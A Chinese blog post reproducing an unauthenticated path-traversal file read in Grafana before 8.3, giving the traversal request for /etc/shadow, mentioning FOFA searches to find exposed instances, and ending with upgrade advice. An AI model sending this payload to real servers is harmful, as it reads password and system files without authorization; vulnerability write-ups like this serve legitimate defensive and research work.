Grafana版本<8.3任意文件读取

最新推荐文章于 2024-03-15 12:01:40 发布
最新推荐文章于 2024-03-15 12:01:40 发布
阅读量655 收藏
点赞数
分类专栏: 漏洞复现 文章标签: http
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l1593572468/article/details/122245813
版权
漏洞复现 专栏收录该内容
31 篇文章 6 订阅 ¥9.90 ¥99.00
订阅专栏

简介

Grafana是一个跨平台、开源的数据可视化网络应用程序平台,用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。目前测试Grafana 8.3之前版本存在未授权任意文件读取漏洞,可以在未经身份验证的情况下可通过默认存在的插件,构造特殊的请求包读取服务器任意文件。

漏洞利用

抓包获取get请求重放数据包

/public/plugins/alertmanager/../../../../../../../../../../etc/shadow

测试

fofa搜索测试,这里版本为V7.2.0

成功读取到passwd文件.

修复建议

更新到V8.3.1以上版本,对漏洞进行了修复。

结语

向上看的同时也要往回看看,所有的路都不容易,我们只能竭尽全力做好当下的努力。

Cheng-Ling
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
小米文件管理4.1.8.3.apk
03-03
小米文件管理最后可以读data私有目录的版本。但是系统会禁止安装(显示不能安装来自其他来源的系统软件),所以我也不知道有什么用,备份一下吧。这个版本之后的文件管理都限制了私有目录的读取
Jprobe8.3破解文件和破解方法 可用
04-24
Jprobe8.3破解相关jar 破解步骤,以及lience
部署prometheus+Grafana可视化仪表盘监控服务
最新发布
小鹏linux的博客
03-15 813
Prometheus是开源监控报警系统和时序列数据库(TSDB)。 Prometheus的基本原理是通过HTTP协议周期性抓取被监控组件的状态,任意组件只要提供对应的HTTP接口就可以接入监控,输出被监控组件信息的HTTP接口被叫做exporter。目前互联网公司常用的组件大部分都有exporter可以直接使用,比如Varnish、Haproxy、Nginx、MySQL、Linux系统信息(包括磁盘、内存、CPU、网络等等)。
IAR-8051-8.3破解文件(已测试,可用)
02-06
资源内包含IAR-8051-8.3软件的破解文件及详细破解方法,另外有问题的话,可以通过私信和我联系。
无标题Proteus 8.3安装包文件
07-29
Proteus 8.3安装包文件
securCRT x64版本8.3
04-25
网络专业必备软件之一,可以远程Telnet和SSH等功能。。。。
Grafana任意文件读取 (CVE-2021-43798)
weixin_63231007的博客
10-07 953
Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件
Grafana plugins 任意文件读取
众生度尽,方证菩提
06-09 180
圣人之道,吾性自足,不假外求
[文件读取]Grafana未授权任意文件读取
wj33333的博客
11-14 368
描述: Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。查看etc/passwd。查看/tmp/flag。
Grafana任意文件读取漏洞(CVE-2021-43798)
热门推荐
chaojixiaojingang
03-14 2万+
1.漏洞描述 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。未授权的攻击者利用该漏洞,能够获取服务器敏感文件。 2.影响版本 Grafana 8.0.0 - 8.3.0 3.漏洞环境搭建 更新vulhub目录,进入vulhub/grafana/CVE-2021-43798 docker-compose up –d #下载安装漏洞镜像 访问目标3000端口 4.漏洞复现 访问...
grafana最新任意文件读取分析以及衍生问题解释
weixin_50464560的博客
12-08 1152
0x00 前言 早上看到chybeta发群里这漏洞的推特截图,隐隐约约记得我们也在用,不过我也没咋在意,直到chybeta和p????秒秒钟复现压力来到了我这边。我十分无助的硬着头皮打开github看grafana的最新版本代码,结果花了一中午,终于在吃了个猪肘饭后分析好了。(唉想上吊了) 下面就大概讲讲我是如何以一个不懂GO基础语法的角度来复现该漏洞的。另外后面会解释一下一些其他实际中遇到的情况。 0x01 分析与复现 我们可以借助历史漏洞的思路来简单分析一下 看到这个经典漏洞是先从api.go文件入手
Grafana 任意文件读取漏洞复现
MrHatSec的博客
03-16 7253
一、漏洞描述 Grafana存在任意文件读取漏洞,通过默认存在的插件,可构造特殊的请求包读取服务器任意文件 二、漏洞影响 Grafana 8.x 三、漏洞复现 可以从登陆页面看到版本信息为 v8.2.4,此版本在漏洞射程范围之内 查看当前所使用的插件: /api/plugins?embedded=0 http://10.10.12.120:443/api/plugins?embedded=0 读取 /etc/passwd文件 POC: /public/plugins/welcome
【漏洞复现】Grafana任意文件读取漏洞 (CVE-2021-43798)
做自己喜欢的事,并将其发挥到极致!
12-08 1128
0X01 漏洞描述 Grafana是一个跨平台、开源的数据可视化网络应用程序平台,用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。 Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。 0x02 源码分析 搜索漏洞存在路径 /public/plugins/ 在api.go文件中 r.Get("/public/plugins/:pluginId/*", hs.getPluginAssets) 跟踪对应的 getPlugin
Grafana 任意文件读取漏洞复现分析
weixin_45794666的博客
03-02 2831
Grafana 任意文件读取漏洞复现分析 CVE-2021-43798 0x01 前言 概述 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。 影响范围 Grafana 8.0.0-beta1 - 8.3.0 安全版本 Grafana >= 8.3.1 Grafana >= 8.2.7 Grafana >= 8.1.8 Grafana >= 8.0.7 0x02 环境搭建 do
Grafana V8.3.x 版本中的新增功能(开源版本
qq_38519364的博客
11-24 628
Grafana 8.3版本包括新的烛台面板、新的可视化建议引擎以及面向企业用户的记录查询。8.3 版本中的 Grafana 警报是适用于所有警报的灵活单一管理平台,其中包括对通知程序、联系点和警报规则的扩展预配支持,以及针对企业客户的审核和精细访问控制。4、从8.3版本中开始,Grafana告警是默认安装的。Grafana 8.3 版本警报包括测试联系点和通知路由的功能。以上功能,Grafana8.3中开源版本的一些功能,企业版本的一些功能此处不再单独罗列,企业版本需要单独收费的。
CVE-2021-43798——Grafana 未授权任意文件读取
LiBai'S BLOG
12-18 1万+
Grafana 未授权任意文件读取~
Prometheus+Grafana企业级监控实战(运维篇)2020年视频教程
02-15
首先从零开始教你搭建Prometheus + Grafana 监控系统。接下来,学习Prometheus主要功能,例如标签、服务发现、PromQL、强大的告警功能,定制告警模板等知识点,然后配合官方提供的组件,进行讲解并且运用于实际。并打造一个完整的企业自定义监控解决方案,并绘制出美观的可视化大盘。不一定要使用教程的版本,你可以直接使用当前官网Latest版本进行搭建。
Grafana v8.3.3二进制部署打开异常问题记录
Less Is More
07-18 1211
Grafana Troubleshooting
Grafana离线安装部署以及插件安装
不许人间丶见白头
09-20 4618
文件位置为:/etc/grafana/grafana.ini,在[plugins]中加入 allow_loading_unsigned_plugins = alexanderzobnin-zabbix-datasource。先去官网下载安装包,https://grafana.com/grafana/plugins?输出可知下载包放到 /var/lib/grafana/plugins目录下,解压后,重启Grafana服务。grafana默认不支持zabbix插件,需要安装zabbix插件。
kettle8.3版本下载
09-06
您可以通过引用中提到的命令来下载Kettle 8.3版本。具体步骤如下: 1. 下载共5个分包,您可以使用命令 "copy /b pdi-ce-8.3.0.0-371.zip.rm1 pdi-ce-8.3.0.0-371.zip.rm2 pdi-ce-8.3.0.0-371.zip.rm3 pdi-ce-8.3.0.0...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cheng-Ling

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值